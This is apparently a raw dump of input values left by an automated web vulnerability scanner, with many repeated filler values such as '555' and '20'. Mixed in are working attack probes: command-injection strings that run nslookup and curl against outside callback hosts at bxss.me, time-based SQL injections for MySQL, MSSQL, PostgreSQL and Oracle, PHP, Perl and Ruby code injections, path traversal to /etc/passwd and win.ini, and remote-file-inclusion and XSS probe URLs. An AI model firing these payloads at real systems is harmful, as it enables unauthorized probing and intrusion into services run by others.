&(nslookup${IFS}-q${IFS}cname${IFS}hithdklnrfcmbcfcce.bxss.me||curl${IFS}hithdklnrfcmbcfcce.bxss.me)&'"`0&(nslookup${IFS}-q${IFS}cname${IFS}hithdklnrfcmbcfcce.bxss.me||curl${IFS}hithdklnrfcmbcfcce.bxss.me)&`'
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
555
555
555
555
/etc/shells
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/shells
555
555
555
555
555
c:/windows/win.ini
'.gethostbyname(lc('hitdq'.'lopplegw51707.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(69).chr(98).chr(71).'
555
555
555
bxss.me
555
".gethostbyname(lc("hitwq"."pwudpyjq8ce61.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(83).chr(110).chr(71)."
555
555
555
gethostbyname(lc('hithg'.'olqahddn2fa4c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(76).chr(120).chr(90)
555
Http://bxss.me/t/fit.txt
555
555
http://bxss.me/t/fit.txt%3F.jpg
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555
555
555
555
555'&&sleep(27*1000)*xytzcq&&'
555
555
555
"+"A".concat(70-3).concat(22*4).concat(121).concat(79).concat(118).concat(79)+(require"socket" Socket.gethostbyname("hitet"+"eutfjivc24d61.bxss.me.")[3].to_s)+"
555
555
555
555"&&sleep(27*1000)*bhiatl&&"
555
'+'A'.concat(70-3).concat(22*4).concat(98).concat(80).concat(108).concat(67)+(require'socket' Socket.gethostbyname('hittp'+'qoboorje5806c.bxss.me.')[3].to_s)+'
555
555
555
555
555
555'||sleep(27*1000)*jjkyms||'
555
'A'.concat(70-3).concat(22*4).concat(106).concat(89).concat(98).concat(87)+(require'socket' Socket.gethostbyname('hitoh'+'iwcglxswe7cfe.bxss.me.')[3].to_s)
555
555
555
555
555"||sleep(27*1000)*bojcyr||"
555
555
HttP://bxss.me/t/xss.html?%00
555
555
bxss.me/t/xss.html?%00
555
555
555
555
555
555
http://bxss.me/t/rfi.php?%00
555
555
555
555
555
555
555
bxss.me/t/rfi.php?%00
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
555
555
555
555
';print(md5(31337));$a='
555
555
555
555
555
";print(md5(31337));$a="
555
555
555
555
555
555
555
${@print(md5(31337))}
${@print(md5(31337))}
555
555
555
555
555
555
'.print(md5(31337)).'
555
555
555
555
555
555
555
555
555
555
555
555
'{${print(md5(31337))}}'
print(md5(31337));//
555
555
555
555
555
{php}print(md5(31337));{/php}
555'"()&%ioH1(9647)
555
555
555
555
555
555
[php]print(md5(31337));[/php]
555
'"()&%ioH1(9563)
555
555
555
5559333435
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555*if(now()=sysdate(),sleep(15),0)
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
555
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555SSPT6CbJ'; waitfor delay '0:0:15' --
555-1 OR 388=(SELECT 388 FROM PG_SLEEP(15))--
555-1) OR 508=(SELECT 508 FROM PG_SLEEP(15))--
555-1)) OR 325=(SELECT 325 FROM PG_SLEEP(15))--
555HT9OCiv5' OR 624=(SELECT 624 FROM PG_SLEEP(15))--
555l7Yld76L') OR 369=(SELECT 369 FROM PG_SLEEP(15))--
555xZcfbQRu')) OR 744=(SELECT 744 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)
555
555'"
555
@@RkA4G
(select 198766*667891)
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
20
20
20
20
20
20
20
20
20
20
response.write(9857855*9914585)
'+response.write(9857855*9914585)+'
20
1G6APZGBP0
20
"+response.write(9857855*9914585)+"
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
20
20
20
20
20
file:///etc/passwd
20
20
20
20
20
20
20
../20
20
20
12345'"'");|]*%00{%0d%0a%bf%27'
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
${10000113+9999978}
20
20
20
20
20
20
20
20
20
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
20
20
20
20
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
20
/etc/shells
20
20
../../../../../../../../../../../../../../etc/shells
20
20
20
c:/windows/win.ini
20
20
20
bxss.me
20
20
20
20
Http://bxss.me/t/fit.txt
20
20
20
http://bxss.me/t/fit.txt%3F.jpg
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
)
20
20
20
!(()&&!|*|*|
20
20
20
^(#$!@#$)(()))******
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
'"()
20
20
echo rptbpl$() sbesvcnz^xyu||a #' &echo rptbpl$() sbesvcnz^xyu||a #|" &echo rptbpl$() sbesvcnz^xyu||a #
20
20'&&sleep(27*1000)*fpwqtl&&'
20
20
20
&echo mqiuha$() jorunvnz^xyu||a #' &echo mqiuha$() jorunvnz^xyu||a #|" &echo mqiuha$() jorunvnz^xyu||a #
20"&&sleep(27*1000)*igbilw&&"
20&echo ftjhbi$() oaxiaenz^xyu||a #' &echo ftjhbi$() oaxiaenz^xyu||a #|" &echo ftjhbi$() oaxiaenz^xyu||a #
20
20
20'||sleep(27*1000)*cifgvt||'
|echo ufpnwc$() gqsxvcnz^xyu||a #' |echo ufpnwc$() gqsxvcnz^xyu||a #|" |echo ufpnwc$() gqsxvcnz^xyu||a #
20
20|echo ersjah$() jdbajanz^xyu||a #' |echo ersjah$() jdbajanz^xyu||a #|" |echo ersjah$() jdbajanz^xyu||a #
redirtest.acx
20"||sleep(27*1000)*siunrg||"
20
expr 9000834377 - 954285
20
20
20
20
(nslookup -q=cname hitvzpxqwehyp6d7dd.bxss.me||curl hitvzpxqwehyp6d7dd.bxss.me))
20
20
$(nslookup -q=cname hituehldrdqqt3525e.bxss.me||curl hituehldrdqqt3525e.bxss.me)
20
20
20
&nslookup -q=cname hitgruwbepysyc06ea.bxss.me&'"`0&nslookup -q=cname hitgruwbepysyc06ea.bxss.me&`'
&(nslookup -q=cname hituwtaavhbbv4eb87.bxss.me||curl hituwtaavhbbv4eb87.bxss.me)&'"`0&(nslookup -q=cname hituwtaavhbbv4eb87.bxss.me||curl hituwtaavhbbv4eb87.bxss.me)&`'
20
20
|(nslookup -q=cname hitynyqetiwvr03aef.bxss.me||curl hitynyqetiwvr03aef.bxss.me)
20
20
20
`(nslookup -q=cname hityjgebjstjr1f951.bxss.me||curl hityjgebjstjr1f951.bxss.me)`
20
20
20
;(nslookup -q=cname hituajdixsaxsf7ffb.bxss.me||curl hituajdixsaxsf7ffb.bxss.me)|(nslookup -q=cname hituajdixsaxsf7ffb.bxss.me||curl hituajdixsaxsf7ffb.bxss.me)&(nslookup -q=cname hituajdixsaxsf7ffb.bxss.me||curl hituajdixsaxsf7ffb.bxss.me)
20
20
20
|(nslookup${IFS}-q${IFS}cname${IFS}hitemguckoypya8ade.bxss.me||curl${IFS}hitemguckoypya8ade.bxss.me)
20
20
20
&(nslookup${IFS}-q${IFS}cname${IFS}hitzbxcfhpnkkf089a.bxss.me||curl${IFS}hitzbxcfhpnkkf089a.bxss.me)&'"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitzbxcfhpnkkf089a.bxss.me||curl${IFS}hitzbxcfhpnkkf089a.bxss.me)&`'
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
'.gethostbyname(lc('hitkm'.'ascjxpom49f53.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(67).chr(110).chr(82).'
20
20
20
20
".gethostbyname(lc("hitno"."wxajlidfa528c.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(65).chr(105).chr(88)."
gethostbyname(lc('hitjr'.'tamigmpd6fb91.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(66).chr(115).chr(69)
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
HttP://bxss.me/t/xss.html?%00
20
20
20
bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(105).concat(83).concat(103).concat(76)+(require"socket" Socket.gethostbyname("hittd"+"jgzvrjwqea9f3.bxss.me.")[3].to_s)+"
20
20
20
http://bxss.me/t/rfi.php?%00
'+'A'.concat(70-3).concat(22*4).concat(106).concat(76).concat(113).concat(83)+(require'socket' Socket.gethostbyname('hitfe'+'ndcqzzbebba45.bxss.me.')[3].to_s)+'
20
bxss.me/t/rfi.php?%00
20
'A'.concat(70-3).concat(22*4).concat(114).concat(75).concat(116).concat(74)+(require'socket' Socket.gethostbyname('hitoc'+'wwymylnna6a7d.bxss.me.')[3].to_s)
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
20
20
20
20
';print(md5(31337));$a='
20
20
20
20
";print(md5(31337));$a="
20
20
20
20
${@print(md5(31337))}
20
20
20
20
${@print(md5(31337))}
20
20
20
'.print(md5(31337)).'
20
20
20
20
20
20
20
'{${print(md5(31337))}}'
20
20
20
print(md5(31337));//
20
20
20
{php}print(md5(31337));{/php}
20
20
20'"()&%UPZ8(9177)
20
[php]print(md5(31337));[/php]
'"()&%UPZ8(9330)
20
20
209075479
20
20
20
'"
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20*if(now()=sysdate(),sleep(15),0)
200'XOR(20*if(now()=sysdate(),sleep(15),0))XOR'Z
200"XOR(20*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
20-1; waitfor delay '0:0:15' --
20-1); waitfor delay '0:0:15' --
20-1 waitfor delay '0:0:15' --
20wi7ZKQTw'; waitfor delay '0:0:15' --
20-1 OR 973=(SELECT 973 FROM PG_SLEEP(15))--
20-1) OR 678=(SELECT 678 FROM PG_SLEEP(15))--
20-1)) OR 758=(SELECT 758 FROM PG_SLEEP(15))--
204DQtOe28' OR 149=(SELECT 149 FROM PG_SLEEP(15))--
20OGRj1nvi') OR 687=(SELECT 687 FROM PG_SLEEP(15))--
208hClf2a2')) OR 195=(SELECT 195 FROM PG_SLEEP(15))--
20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
20'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)
20
20'"
20
@@IKtZY
(select 198766*667891)
(select 198766*667891 from DUAL)
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20